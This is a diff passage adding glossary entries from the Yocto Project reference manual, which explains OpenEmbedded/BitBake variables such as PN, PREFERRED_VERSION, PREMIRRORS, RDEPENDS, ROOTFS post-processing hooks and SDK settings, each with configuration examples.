+      Points to the parent directory for files to be packaged after they
+      have been split into individual packages. This directory defaults to
+      the following:
+      ::
+
+         ${WORKDIR}/packages-split
+
+      Under this directory, the build system creates directories for each
+      package specified in :term:`PACKAGES`. Do not change
+      this default.
+
+   :term:`PKGDESTWORK`
+      Points to a temporary work area where the
+      :ref:`ref-tasks-package` task saves package metadata.
+      The ``PKGDESTWORK`` location defaults to the following:
+      ::
+
+         ${WORKDIR}/pkgdata
+
+      Do not change this default.
+
+      The :ref:`ref-tasks-packagedata` task copies the
+      package metadata from ``PKGDESTWORK`` to
+      :term:`PKGDATA_DIR` to make it available globally.
+
+   :term:`PKGE`
+      The epoch of the package(s) built by the recipe. By default, ``PKGE``
+      is set to :term:`PE`.
+
+   :term:`PKGR`
+      The revision of the package(s) built by the recipe. By default,
+      ``PKGR`` is set to :term:`PR`.
+
+   :term:`PKGV`
+      The version of the package(s) built by the recipe. By default,
+      ``PKGV`` is set to :term:`PV`.
+
+   :term:`PN`
+      This variable can have two separate functions depending on the
+      context: a recipe name or a resulting package name.
+
+      ``PN`` refers to a recipe name in the context of a file used by the
+      OpenEmbedded build system as input to create a package. The name is
+      normally extracted from the recipe file name. For example, if the
+      recipe is named ``expat_2.0.1.bb``, then the default value of ``PN``
+      will be "expat".
+
+      The variable refers to a package name in the context of a file
+      created or produced by the OpenEmbedded build system.
+
+      If applicable, the ``PN`` variable also contains any special suffix
+      or prefix. For example, using ``bash`` to build packages for the
+      native machine, ``PN`` is ``bash-native``. Using ``bash`` to build
+      packages for the target and for Multilib, ``PN`` would be ``bash``
+      and ``lib64-bash``, respectively.
+
+   :term:`PNBLACKLIST`
+      Lists recipes you do not want the OpenEmbedded build system to build.
+      This variable works in conjunction with the
+      :ref:`blacklist <ref-classes-blacklist>` class, which is inherited
+      globally.
+
+      To prevent a recipe from being built, use the ``PNBLACKLIST``
+      variable in your ``local.conf`` file. Here is an example that
+      prevents ``myrecipe`` from being built:
+      ::
+
+         PNBLACKLIST[myrecipe] = "Not supported by our organization."
+
+   :term:`POPULATE_SDK_POST_HOST_COMMAND`
+      Specifies a list of functions to call once the OpenEmbedded build
+      system has created the host part of the SDK. You can specify
+      functions separated by semicolons:
+      ::
+
+          POPULATE_SDK_POST_HOST_COMMAND += "function; ... "
+
+      If you need to pass the SDK path to a command within a function, you
+      can use ``${SDK_DIR}``, which points to the parent directory used by
+      the OpenEmbedded build system when creating SDK output. See the
+      :term:`SDK_DIR` variable for more information.
+
+   :term:`POPULATE_SDK_POST_TARGET_COMMAND`
+      Specifies a list of functions to call once the OpenEmbedded build
+      system has created the target part of the SDK. You can specify
+      functions separated by semicolons:
+      ::
+
+         POPULATE_SDK_POST_TARGET_COMMAND += "function; ... "
+
+      If you need to pass the SDK path to a command within a function, you
+      can use ``${SDK_DIR}``, which points to the parent directory used by
+      the OpenEmbedded build system when creating SDK output. See the
+      :term:`SDK_DIR` variable for more information.
+
+   :term:`PR`
+      The revision of the recipe. The default value for this variable is
+      "r0". Subsequent revisions of the recipe conventionally have the
+      values "r1", "r2", and so forth. When :term:`PV` increases,
+      ``PR`` is conventionally reset to "r0".
+
+      .. note::
+
+         The OpenEmbedded build system does not need the aid of ``PR``
+         to know when to rebuild a recipe. The build system uses the task
+         :ref:`input checksums <overview-checksums>` along with the
+         :ref:`stamp <structure-build-tmp-stamps>` and
+         :ref:`overview-manual/overview-manual-concepts:shared state cache`
+         mechanisms.
+
+      The ``PR`` variable primarily becomes significant when a package
+      manager dynamically installs packages on an already built image. In
+      this case, ``PR``, which is the default value of
+      :term:`PKGR`, helps the package manager distinguish which
+      package is the most recent one in cases where many packages have the
+      same ``PV`` (i.e. ``PKGV``). A component having many packages with
+      the same ``PV`` usually means that the packages all install the same
+      upstream version, but with later (``PR``) version packages including
+      packaging fixes.
+
+      .. note::
+
+         ``PR`` does not need to be increased for changes that do not change the
+         package contents or metadata.
+
+      Because manually managing ``PR`` can be cumbersome and error-prone,
+      an automated solution exists. See the
+      ":ref:`dev-manual/dev-manual-common-tasks:working with a pr service`" section
+      in the Yocto Project Development Tasks Manual for more information.
+
+   :term:`PREFERRED_PROVIDER`
+      If multiple recipes provide the same item, this variable determines
+      which recipe is preferred and thus provides the item (i.e. the
+      preferred provider). You should always suffix this variable with the
+      name of the provided item. And, you should define the variable using
+      the preferred recipe's name (:term:`PN`). Here is a common
+      example:
+      ::
+
+         PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
+
+      In the previous example, multiple recipes are providing "virtual/kernel".
+      The ``PREFERRED_PROVIDER`` variable is set with the name (``PN``) of
+      the recipe you prefer to provide "virtual/kernel".
+
+      Following are more examples:
+      ::
+
+         PREFERRED_PROVIDER_virtual/xserver = "xserver-xf86"
+         PREFERRED_PROVIDER_virtual/libgl ?= "mesa"
+
+      For more
+      information, see the ":ref:`metadata-virtual-providers`"
+      section in the Yocto Project Development Tasks Manual.
+
+      .. note::
+
+         If you use a ``virtual/\*`` item with ``PREFERRED_PROVIDER``, then any
+         recipe that :term:`PROVIDES` that item but is not selected (defined)
+         by ``PREFERRED_PROVIDER`` is prevented from building, which is usually
+         desirable since this mechanism is designed to select between mutually
+         exclusive alternative providers.
+
+   :term:`PREFERRED_VERSION`
+      If multiple versions of recipes exist, this variable determines which
+      version is given preference. You must always suffix the variable with
+      the :term:`PN` you want to select, and you should set the
+      :term:`PV` accordingly for precedence.
+
+      The ``PREFERRED_VERSION`` variable supports limited wildcard use
+      through the "``%``" character. You can use the character to match any
+      number of characters, which can be useful when specifying versions
+      that contain long revision numbers that potentially change. Here are
+      two examples:
+      ::
+
+         PREFERRED_VERSION_python = "3.4.0"
+         PREFERRED_VERSION_linux-yocto = "5.0%"
+
+      .. note::
+
+         The use of the "%" character is limited in that it only works at the end of the
+         string. You cannot use the wildcard character in any other
+         location of the string.
+
+      The specified version is matched against :term:`PV`, which
+      does not necessarily match the version part of the recipe's filename.
+      For example, consider two recipes ``foo_1.2.bb`` and ``foo_git.bb``
+      where ``foo_git.bb`` contains the following assignment:
+      ::
+
+         PV = "1.1+git${SRCPV}"
+
+      In this case, the correct way to select
+      ``foo_git.bb`` is by using an assignment such as the following:
+      ::
+
+         PREFERRED_VERSION_foo = "1.1+git%"
+
+      Compare that previous example
+      against the following incorrect example, which does not work:
+      ::
+
+         PREFERRED_VERSION_foo = "git"
+
+      Sometimes the ``PREFERRED_VERSION`` variable can be set by
+      configuration files in a way that is hard to change. You can use
+      :term:`OVERRIDES` to set a machine-specific
+      override. Here is an example:
+      ::
+
+         PREFERRED_VERSION_linux-yocto_qemux86 = "5.0%"
+
+      Although not recommended, worst case, you can also use the
+      "forcevariable" override, which is the strongest override possible.
+      Here is an example:
+      ::
+
+         PREFERRED_VERSION_linux-yocto_forcevariable = "5.0%"
+
+      .. note::
+
+         The ``\_forcevariable`` override is not handled specially. This override
+         only works because the default value of ``OVERRIDES`` includes "forcevariable".
+
+   :term:`PREMIRRORS`
+      Specifies additional paths from which the OpenEmbedded build system
+      gets source code. When the build system searches for source code, it
+      first tries the local download directory. If that location fails, the
+      build system tries locations defined by ``PREMIRRORS``, the upstream
+      source, and then locations specified by
+      :term:`MIRRORS` in that order.
+
+      Assuming your distribution (:term:`DISTRO`) is "poky",
+      the default value for ``PREMIRRORS`` is defined in the
+      ``conf/distro/poky.conf`` file in the ``meta-poky`` Git repository.
+
+      Typically, you could add a specific server for the build system to
+      attempt before any others by adding something like the following to
+      the ``local.conf`` configuration file in the
+      :term:`Build Directory`:
+      ::
+
+         PREMIRRORS_prepend = "\
+             git://.*/.* http://www.yoctoproject.org/sources/ \n \
+             ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
+             http://.*/.* http://www.yoctoproject.org/sources/ \n \
+             https://.*/.* http://www.yoctoproject.org/sources/ \n"
+
+      These changes cause the
+      build system to intercept Git, FTP, HTTP, and HTTPS requests and
+      direct them to the ``http://`` sources mirror. You can use
+      ``file://`` URLs to point to local directories or network shares as
+      well.
+
+   :term:`PRIORITY`
+      Indicates the importance of a package.
+
+      ``PRIORITY`` is considered to be part of the distribution policy
+      because the importance of any given recipe depends on the purpose for
+      which the distribution is being produced. Thus, ``PRIORITY`` is not
+      normally set within recipes.
+
+      You can set ``PRIORITY`` to "required", "standard", "extra", and
+      "optional", which is the default.
+
+   :term:`PRIVATE_LIBS`
+      Specifies libraries installed within a recipe that should be ignored
+      by the OpenEmbedded build system's shared library resolver. This
+      variable is typically used when software being built by a recipe has
+      its own private versions of a library normally provided by another
+      recipe. In this case, you would not want the package containing the
+      private libraries to be set as a dependency on other unrelated
+      packages that should instead depend on the package providing the
+      standard version of the library.
+
+      Libraries specified in this variable should be specified by their
+      file name. For example, from the Firefox recipe in meta-browser:
+      ::
+
+         PRIVATE_LIBS = "libmozjs.so \
+                         libxpcom.so \
+                         libnspr4.so \
+                         libxul.so \
+                         libmozalloc.so \
+                         libplc4.so \
+                         libplds4.so"
+
+      For more information, see the
+      ":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+      section in the Yocto Project Overview and Concepts Manual.
+
+   :term:`PROVIDES`
+      A list of aliases by which a particular recipe can be known. By
+      default, a recipe's own ``PN`` is implicitly already in its
+      ``PROVIDES`` list and therefore does not need to mention that it
+      provides itself. If a recipe uses ``PROVIDES``, the additional
+      aliases are synonyms for the recipe and can be useful for satisfying
+      dependencies of other recipes during the build as specified by
+      ``DEPENDS``.
+
+      Consider the following example ``PROVIDES`` statement from the recipe
+      file ``eudev_3.2.9.bb``:
+      ::
+
+         PROVIDES = "udev"
+
+      The ``PROVIDES`` statement
+      results in the "eudev" recipe also being available as simply "udev".
+
+      .. note::
+
+         Given that a recipe's own recipe name is already implicitly in its
+         own PROVIDES list, it is unnecessary to add aliases with the "+=" operator;
+         using a simple assignment will be sufficient. In other words,
+         while you could write:
+         ::
+
+                 PROVIDES += "udev"
+
+
+         in the above, the "+=" is overkill and unnecessary.
+
+      In addition to providing recipes under alternate names, the
+      ``PROVIDES`` mechanism is also used to implement virtual targets. A
+      virtual target is a name that corresponds to some particular
+      functionality (e.g. a Linux kernel). Recipes that provide the
+      functionality in question list the virtual target in ``PROVIDES``.
+      Recipes that depend on the functionality in question can include the
+      virtual target in ``DEPENDS`` to leave the choice of provider open.
+
+      Conventionally, virtual targets have names on the form
+      "virtual/function" (e.g. "virtual/kernel"). The slash is simply part
+      of the name and has no syntactical significance.
+
+      The :term:`PREFERRED_PROVIDER` variable is
+      used to select which particular recipe provides a virtual target.
+
+      .. note::
+
+         A corresponding mechanism for virtual runtime dependencies
+         (packages) exists. However, the mechanism does not depend on any
+         special functionality beyond ordinary variable assignments. For
+         example, ``VIRTUAL-RUNTIME_dev_manager`` refers to the package of
+         the component that manages the ``/dev`` directory.
+
+         Setting the "preferred provider" for runtime dependencies is as
+         simple as using the following assignment in a configuration file:
+         ::
+
+                 VIRTUAL-RUNTIME_dev_manager = "udev"
+
+
+   :term:`PRSERV_HOST`
+      The network based :term:`PR` service host and port.
+
+      The ``conf/local.conf.sample.extended`` configuration file in the
+      :term:`Source Directory` shows how the
+      ``PRSERV_HOST`` variable is set:
+      ::
+
+         PRSERV_HOST = "localhost:0"
+
+      You must
+      set the variable if you want to automatically start a local :ref:`PR
+      service <dev-manual/dev-manual-common-tasks:working with a pr service>`. You can
+      set ``PRSERV_HOST`` to other values to use a remote PR service.
+
+   :term:`PTEST_ENABLED`
+      Specifies whether or not :ref:`Package
+      Test <dev-manual/dev-manual-common-tasks:testing packages with ptest>` (ptest)
+      functionality is enabled when building a recipe. You should not set
+      this variable directly. Enabling and disabling building Package Tests
+      at build time should be done by adding "ptest" to (or removing it
+      from) :term:`DISTRO_FEATURES`.
+
+   :term:`PV`
+      The version of the recipe. The version is normally extracted from the
+      recipe filename. For example, if the recipe is named
+      ``expat_2.0.1.bb``, then the default value of ``PV`` will be "2.0.1".
+      ``PV`` is generally not overridden within a recipe unless it is
+      building an unstable (i.e. development) version from a source code
+      repository (e.g. Git or Subversion).
+
+      ``PV`` is the default value of the :term:`PKGV` variable.
+
+   :term:`PYTHON_ABI`
+      When used by recipes that inherit the
+      :ref:`distutils3 <ref-classes-distutils3>`,
+      :ref:`setuptools3 <ref-classes-setuptools3>`,
+      :ref:`distutils <ref-classes-distutils>`, or
+      :ref:`setuptools <ref-classes-setuptools>` classes, denotes the
+      Application Binary Interface (ABI) currently in use for Python. By
+      default, the ABI is "m". You do not have to set this variable as the
+      OpenEmbedded build system sets it for you.
+
+      The OpenEmbedded build system uses the ABI to construct directory
+      names used when installing the Python headers and libraries in
+      sysroot (e.g. ``.../python3.3m/...``).
+
+      Recipes that inherit the ``distutils`` class during cross-builds also
+      use this variable to locate the headers and libraries of the
+      appropriate Python that the extension is targeting.
+
+   :term:`PYTHON_PN`
+      When used by recipes that inherit the
+      `distutils3 <ref-classes-distutils3>`,
+      :ref:`setuptools3 <ref-classes-setuptools3>`,
+      :ref:`distutils <ref-classes-distutils>`, or
+      :ref:`setuptools <ref-classes-setuptools>` classes, specifies the
+      major Python version being built. For Python 3.x, ``PYTHON_PN`` would
+      be "python3". You do not have to set this variable as the
+      OpenEmbedded build system automatically sets it for you.
+
+      The variable allows recipes to use common infrastructure such as the
+      following:
+      ::
+
+         DEPENDS += "${PYTHON_PN}-native"
+
+      In the previous example,
+      the version of the dependency is ``PYTHON_PN``.
+
+   :term:`RANLIB`
+      The minimal command and arguments to run ``ranlib``.
+
+   :term:`RCONFLICTS`
+      The list of packages that conflict with packages. Note that packages
+      will not be installed if conflicting packages are not first removed.
+
+      Like all package-controlling variables, you must always use them in
+      conjunction with a package name override. Here is an example:
+      ::
+
+         RCONFLICTS_${PN} = "another_conflicting_package_name"
+
+      BitBake, which the OpenEmbedded build system uses, supports
+      specifying versioned dependencies. Although the syntax varies
+      depending on the packaging format, BitBake hides these differences
+      from you. Here is the general syntax to specify versions with the
+      ``RCONFLICTS`` variable:
+      ::
+
+         RCONFLICTS_${PN} = "package (operator version)"
+
+      For ``operator``, you can specify the following:
+
+      - =
+      - <
+      - >
+      - <=
+      - >=
+
+      For example, the following sets up a dependency on version 1.2 or
+      greater of the package ``foo``:
+      ::
+
+         RCONFLICTS_${PN} = "foo (>= 1.2)"
+
+   :term:`RDEPENDS`
+      Lists runtime dependencies of a package. These dependencies are other
+      packages that must be installed in order for the package to function
+      correctly. As an example, the following assignment declares that the
+      package ``foo`` needs the packages ``bar`` and ``baz`` to be
+      installed:
+      ::
+
+         RDEPENDS_foo = "bar baz"
+
+      The most common types of package
+      runtime dependencies are automatically detected and added. Therefore,
+      most recipes do not need to set ``RDEPENDS``. For more information,
+      see the
+      ":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+      section in the Yocto Project Overview and Concepts Manual.
+
+      The practical effect of the above ``RDEPENDS`` assignment is that
+      ``bar`` and ``baz`` will be declared as dependencies inside the
+      package ``foo`` when it is written out by one of the
+      :ref:`do_package_write_\* <ref-tasks-package_write_deb>` tasks.
+      Exactly how this is done depends on which package format is used,
+      which is determined by
+      :term:`PACKAGE_CLASSES`. When the
+      corresponding package manager installs the package, it will know to
+      also install the packages on which it depends.
+
+      To ensure that the packages ``bar`` and ``baz`` get built, the
+      previous ``RDEPENDS`` assignment also causes a task dependency to be
+      added. This dependency is from the recipe's
+      :ref:`ref-tasks-build` (not to be confused with
+      :ref:`ref-tasks-compile`) task to the
+      ``do_package_write_*`` task of the recipes that build ``bar`` and
+      ``baz``.
+
+      The names of the packages you list within ``RDEPENDS`` must be the
+      names of other packages - they cannot be recipe names. Although
+      package names and recipe names usually match, the important point
+      here is that you are providing package names within the ``RDEPENDS``
+      variable. For an example of the default list of packages created from
+      a recipe, see the :term:`PACKAGES` variable.
+
+      Because the ``RDEPENDS`` variable applies to packages being built,
+      you should always use the variable in a form with an attached package
+      name (remember that a single recipe can build multiple packages). For
+      example, suppose you are building a development package that depends
+      on the ``perl`` package. In this case, you would use the following
+      ``RDEPENDS`` statement:
+      ::
+
+         RDEPENDS_${PN}-dev += "perl"
+
+      In the example,
+      the development package depends on the ``perl`` package. Thus, the
+      ``RDEPENDS`` variable has the ``${PN}-dev`` package name as part of
+      the variable.
+
+      .. note::
+
+         ``RDEPENDS_${PN}-dev`` includes ``${``\ :term:`PN`\ ``}``
+         by default. This default is set in the BitBake configuration file
+         (``meta/conf/bitbake.conf``). Be careful not to accidentally remove
+         ``${PN}`` when modifying ``RDEPENDS_${PN}-dev``. Use the "+=" operator
+         rather than the "=" operator.
+
+      The package names you use with ``RDEPENDS`` must appear as they would
+      in the ``PACKAGES`` variable. The :term:`PKG` variable
+      allows a different name to be used for the final package (e.g. the
+      :ref:`debian <ref-classes-debian>` class uses this to rename
+      packages), but this final package name cannot be used with
+      ``RDEPENDS``, which makes sense as ``RDEPENDS`` is meant to be
+      independent of the package format used.
+
+      BitBake, which the OpenEmbedded build system uses, supports
+      specifying versioned dependencies. Although the syntax varies
+      depending on the packaging format, BitBake hides these differences
+      from you. Here is the general syntax to specify versions with the
+      ``RDEPENDS`` variable:
+      ::
+
+         RDEPENDS_${PN} = "package (operator version)"
+
+      For ``operator``, you can specify the following:
+
+      - =
+      - <
+      - >
+      - <=
+      - >=
+
+      For version, provide the version number.
+
+      .. note::
+
+         You can use ``EXTENDPKGV`` to provide a full package version
+         specification.
+
+      For example, the following sets up a dependency on version 1.2 or
+      greater of the package ``foo``:
+      ::
+
+         RDEPENDS_${PN} = "foo (>= 1.2)"
+
+      For information on build-time dependencies, see the
+      :term:`DEPENDS` variable. You can also see the
+      ":ref:`Tasks <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:tasks>`" and
+      ":ref:`Dependencies <bitbake:bitbake-user-manual/bitbake-user-manual-execution:dependencies>`" sections in the
+      BitBake User Manual for additional information on tasks and
+      dependencies.
+
+   :term:`REQUIRED_DISTRO_FEATURES`
+      When inheriting the
+      :ref:`features_check <ref-classes-features_check>`
+      class, this variable identifies distribution features that must exist
+      in the current configuration in order for the OpenEmbedded build
+      system to build the recipe. In other words, if the
+      ``REQUIRED_DISTRO_FEATURES`` variable lists a feature that does not
+      appear in ``DISTRO_FEATURES`` within the current configuration, then
+      the recipe will be skipped, and if the build system attempts to build
+      the recipe then an error will be triggered.
+
+   :term:`RM_WORK_EXCLUDE`
+      With ``rm_work`` enabled, this variable specifies a list of recipes
+      whose work directories should not be removed. See the
+      ":ref:`rm_work.bbclass <ref-classes-rm-work>`" section for more
+      details.
+
+   :term:`ROOT_HOME`
+      Defines the root home directory. By default, this directory is set as
+      follows in the BitBake configuration file:
+      ::
+
+         ROOT_HOME ??= "/home/root"
+
+      .. note::
+
+         This default value is likely used because some embedded solutions
+         prefer to have a read-only root filesystem and prefer to keep
+         writeable data in one place.
+
+      You can override the default by setting the variable in any layer or
+      in the ``local.conf`` file. Because the default is set using a "weak"
+      assignment (i.e. "??="), you can use either of the following forms to
+      define your override:
+      ::
+
+         ROOT_HOME = "/root"
+         ROOT_HOME ?= "/root"
+
+      These
+      override examples use ``/root``, which is probably the most commonly
+      used override.
+
+   :term:`ROOTFS`
+      Indicates a filesystem image to include as the root filesystem.
+
+      The ``ROOTFS`` variable is an optional variable used with the
+      :ref:`image-live <ref-classes-image-live>` class.
+
+   :term:`ROOTFS_POSTINSTALL_COMMAND`
+      Specifies a list of functions to call after the OpenEmbedded build
+      system has installed packages. You can specify functions separated by
+      semicolons:
+      ::
+
+         ROOTFS_POSTINSTALL_COMMAND += "function; ... "
+
+      If you need to pass the root filesystem path to a command within a
+      function, you can use ``${IMAGE_ROOTFS}``, which points to the
+      directory that becomes the root filesystem image. See the
+      :term:`IMAGE_ROOTFS` variable for more
+      information.
+
+   :term:`ROOTFS_POSTPROCESS_COMMAND`
+      Specifies a list of functions to call once the OpenEmbedded build
+      system has created the root filesystem. You can specify functions
+      separated by semicolons:
+      ::
+
+         ROOTFS_POSTPROCESS_COMMAND += "function; ... "
+
+      If you need to pass the root filesystem path to a command within a
+      function, you can use ``${IMAGE_ROOTFS}``, which points to the
+      directory that becomes the root filesystem image. See the
+      :term:`IMAGE_ROOTFS` variable for more
+      information.
+
+   :term:`ROOTFS_POSTUNINSTALL_COMMAND`
+      Specifies a list of functions to call after the OpenEmbedded build
+      system has removed unnecessary packages. When runtime package
+      management is disabled in the image, several packages are removed
+      including ``base-passwd``, ``shadow``, and ``update-alternatives``.
+      You can specify functions separated by semicolons:
+      ::
+
+         ROOTFS_POSTUNINSTALL_COMMAND += "function; ... "
+
+      If you need to pass the root filesystem path to a command within a
+      function, you can use ``${IMAGE_ROOTFS}``, which points to the
+      directory that becomes the root filesystem image. See the
+      :term:`IMAGE_ROOTFS` variable for more
+      information.
+
+   :term:`ROOTFS_PREPROCESS_COMMAND`
+      Specifies a list of functions to call before the OpenEmbedded build
+      system has created the root filesystem. You can specify functions
+      separated by semicolons:
+      ::
+
+         ROOTFS_PREPROCESS_COMMAND += "function; ... "
+
+      If you need to pass the root filesystem path to a command within a
+      function, you can use ``${IMAGE_ROOTFS}``, which points to the
+      directory that becomes the root filesystem image. See the
+      :term:`IMAGE_ROOTFS` variable for more
+      information.
+
+   :term:`RPROVIDES`
+      A list of package name aliases that a package also provides. These
+      aliases are useful for satisfying runtime dependencies of other
+      packages both during the build and on the target (as specified by
+      ``RDEPENDS``).
+
+      .. note::
+
+         A package's own name is implicitly already in its ``RPROVIDES`` list.
+
+      As with all package-controlling variables, you must always use the
+      variable in conjunction with a package name override. Here is an
+      example:
+      ::
+
+         RPROVIDES_${PN} = "widget-abi-2"
+
+   :term:`RRECOMMENDS`
+      A list of packages that extends the usability of a package being
+      built. The package being built does not depend on this list of
+      packages in order to successfully build, but rather uses them for
+      extended usability. To specify runtime dependencies for packages, see
+      the ``RDEPENDS`` variable.
+
+      The package manager will automatically install the ``RRECOMMENDS``
+      list of packages when installing the built package. However, you can
+      prevent listed packages from being installed by using the
+      :term:`BAD_RECOMMENDATIONS`,
+      :term:`NO_RECOMMENDATIONS`, and
+      :term:`PACKAGE_EXCLUDE` variables.
+
+      Packages specified in ``RRECOMMENDS`` need not actually be produced.
+      However, a recipe must exist that provides each package, either
+      through the :term:`PACKAGES` or
+      :term:`PACKAGES_DYNAMIC` variables or the
+      :term:`RPROVIDES` variable, or an error will occur
+      during the build. If such a recipe does exist and the package is not
+      produced, the build continues without error.
+
+      Because the ``RRECOMMENDS`` variable applies to packages being built,
+      you should always attach an override to the variable to specify the
+      particular package whose usability is being extended. For example,
+      suppose you are building a development package that is extended to
+      support wireless functionality. In this case, you would use the
+      following:
+      ::
+
+         RRECOMMENDS_${PN}-dev += "wireless_package_name"
+
+      In the
+      example, the package name (``${PN}-dev``) must appear as it would in
+      the ``PACKAGES`` namespace before any renaming of the output package
+      by classes such as ``debian.bbclass``.
+
+      BitBake, which the OpenEmbedded build system uses, supports
+      specifying versioned recommends. Although the syntax varies depending
+      on the packaging format, BitBake hides these differences from you.
+      Here is the general syntax to specify versions with the
+      ``RRECOMMENDS`` variable:
+      ::
+
+         RRECOMMENDS_${PN} = "package (operator version)"
+
+      For ``operator``, you can specify the following:
+
+      - =
+      - <
+      - >
+      - <=
+      - >=
+
+      For example, the following sets up a recommend on version 1.2 or
+      greater of the package ``foo``:
+      ::
+
+         RRECOMMENDS_${PN} = "foo (>= 1.2)"
+
+   :term:`RREPLACES`
+      A list of packages replaced by a package. The package manager uses
+      this variable to determine which package should be installed to
+      replace other package(s) during an upgrade. In order to also have the
+      other package(s) removed at the same time, you must add the name of
+      the other package to the ``RCONFLICTS`` variable.
+
+      As with all package-controlling variables, you must use this variable
+      in conjunction with a package name override. Here is an example:
+      ::
+
+         RREPLACES_${PN} = "other_package_being_replaced"
+
+      BitBake, which the OpenEmbedded build system uses, supports
+      specifying versioned replacements. Although the syntax varies
+      depending on the packaging format, BitBake hides these differences
+      from you. Here is the general syntax to specify versions with the
+      ``RREPLACES`` variable:
+      ::
+
+         RREPLACES_${PN} = "package (operator version)"
+
+      For ``operator``, you can specify the following:
+
+      - =
+      - <
+      - >
+      - <=
+      - >=
+
+      For example, the following sets up a replacement using version 1.2
+      or greater of the package ``foo``:
+      ::
+
+          RREPLACES_${PN} = "foo (>= 1.2)"
+
+   :term:`RSUGGESTS`
+      A list of additional packages that you can suggest for installation
+      by the package manager at the time a package is installed. Not all
+      package managers support this functionality.
+
+      As with all package-controlling variables, you must always use this
+      variable in conjunction with a package name override. Here is an
+      example:
+      ::
+
+         RSUGGESTS_${PN} = "useful_package another_package"
+
+   :term:`S`
+      The location in the :term:`Build Directory` where
+      unpacked recipe source code resides. By default, this directory is
+      ``${``\ :term:`WORKDIR`\ ``}/${``\ :term:`BPN`\ ``}-${``\ :term:`PV`\ ``}``,
+      where ``${BPN}`` is the base recipe name and ``${PV}`` is the recipe
+      version. If the source tarball extracts the code to a directory named
+      anything other than ``${BPN}-${PV}``, or if the source code is
+      fetched from an SCM such as Git or Subversion, then you must set
+      ``S`` in the recipe so that the OpenEmbedded build system knows where
+      to find the unpacked source.
+
+      As an example, assume a :term:`Source Directory`
+      top-level folder named ``poky`` and a default Build Directory at
+      ``poky/build``. In this case, the work directory the build system
+      uses to keep the unpacked recipe for ``db`` is the following:
+      ::
+
+         poky/build/tmp/work/qemux86-poky-linux/db/5.1.19-r3/db-5.1.19
+
+      The unpacked source code resides in the ``db-5.1.19`` folder.
+
+      This next example assumes a Git repository. By default, Git
+      repositories are cloned to ``${WORKDIR}/git`` during
+      :ref:`ref-tasks-fetch`. Since this path is different
+      from the default value of ``S``, you must set it specifically so the
+      source can be located:
+      ::
+
+         SRC_URI = "git://path/to/repo.git"
+         S = "${WORKDIR}/git"
+
+   :term:`SANITY_REQUIRED_UTILITIES`
+      Specifies a list of command-line utilities that should be checked for
+      during the initial sanity checking process when running BitBake. If
+      any of the utilities are not installed on the build host, then
+      BitBake immediately exits with an error.
+
+   :term:`SANITY_TESTED_DISTROS`
+      A list of the host distribution identifiers that the build system has
+      been tested against. Identifiers consist of the host distributor ID
+      followed by the release, as reported by the ``lsb_release`` tool or
+      as read from ``/etc/lsb-release``. Separate the list items with
+      explicit newline characters (``\n``). If ``SANITY_TESTED_DISTROS`` is
+      not empty and the current value of
+      :term:`NATIVELSBSTRING` does not appear in the
+      list, then the build system reports a warning that indicates the
+      current host distribution has not been tested as a build host.
+
+   :term:`SDK_ARCH`
+      The target architecture for the SDK. Typically, you do not directly
+      set this variable. Instead, use :term:`SDKMACHINE`.
+
+   :term:`SDK_DEPLOY`
+      The directory set up and used by the
+      :ref:`populate_sdk_base <ref-classes-populate-sdk>` class to which
+      the SDK is deployed. The ``populate_sdk_base`` class defines
+      ``SDK_DEPLOY`` as follows:
+      ::
+
+         SDK_DEPLOY = "${TMPDIR}/deploy/sdk"
+
+   :term:`SDK_DIR`
+      The parent directory used by the OpenEmbedded build system when
+      creating SDK output. The
+      :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class defines
+      the variable as follows:
+      ::
+
+         SDK_DIR = "${WORKDIR}/sdk"
+
+      .. note::
+
+         The ``SDK_DIR`` directory is a temporary directory as it is part of
+         ``WORKDIR``. The final output directory is :term:`SDK_DEPLOY`.
+
+   :term:`SDK_EXT_TYPE`
+      Controls whether or not shared state artifacts are copied into the
+      extensible SDK. The default value of "full" copies all of the
+      required shared state artifacts into the extensible SDK. The value
+      "minimal" leaves these artifacts out of the SDK.
+
+      .. note::
+
+         If you set the variable to "minimal", you need to ensure
+         :term:`SSTATE_MIRRORS` is set in the SDK's configuration to enable the
+         artifacts to be fetched as needed.
+
+   :term:`SDK_HOST_MANIFEST`
+      The manifest file for the host part of the SDK. This file lists all
+      the installed packages that make up the host part of the SDK. The
+      file contains package information on a line-per-package basis as
+      follows:
+      ::
+
+         packagename packagearch version
+
+      The :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class
+      defines the manifest file as follows:
+      ::
+
+         SDK_HOST_MANIFEST = "${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.host.manifest"
+
+      The location is derived using the :term:`SDK_DEPLOY` and
+      :term:`TOOLCHAIN_OUTPUTNAME` variables.
+
+   :term:`SDK_INCLUDE_PKGDATA`
+      When set to "1", specifies to include the packagedata for all recipes
+      in the "world" target in the extensible SDK. Including this data
+      allows the ``devtool search`` command to find these recipes in search
+      results, as well as allows the ``devtool add`` command to map
+      dependencies more effectively.
+
+      .. note::
+
+         Enabling the ``SDK_INCLUDE_PKGDATA``
+         variable significantly increases build time because all of world
+         needs to be built. Enabling the variable also slightly increases
+         the size of the extensible SDK.
+
+   :term:`SDK_INCLUDE_TOOLCHAIN`
+      When set to "1", specifies to include the toolchain in the extensible
+      SDK. Including the toolchain is useful particularly when
+      :term:`SDK_EXT_TYPE` is set to "minimal" to keep
+      the SDK reasonably small but you still want to provide a usable
+      toolchain. For example, suppose you want to use the toolchain from an
+      IDE or from other tools and you do not want to perform additional
+      steps to install the toolchain.
+
+      The ``SDK_INCLUDE_TOOLCHAIN`` variable defaults to "0" if
+      ``SDK_EXT_TYPE`` is set to "minimal", and defaults to "1" if
+      ``SDK_EXT_TYPE`` is set to "full".
+
+   :term:`SDK_INHERIT_BLACKLIST`
+      A list of classes to remove from the :term:`INHERIT`
+      value globally within the extensible SDK configuration. The
+      :ref:`populate-sdk-ext <ref-classes-populate-sdk-*>` class sets the
+      default value:
+      ::
+
+         SDK_INHERIT_BLACKLIST ?= "buildhistory icecc"
+
+      Some classes are not generally applicable within the extensible SDK
+      context. You can use this variable to disable those classes.
+
+      For additional information on how to customize the extensible SDK's
+      configuration, see the
+      ":ref:`sdk-manual/sdk-appendix-customizing:configuring the extensible sdk`"
+      section in the Yocto Project Application Development and the
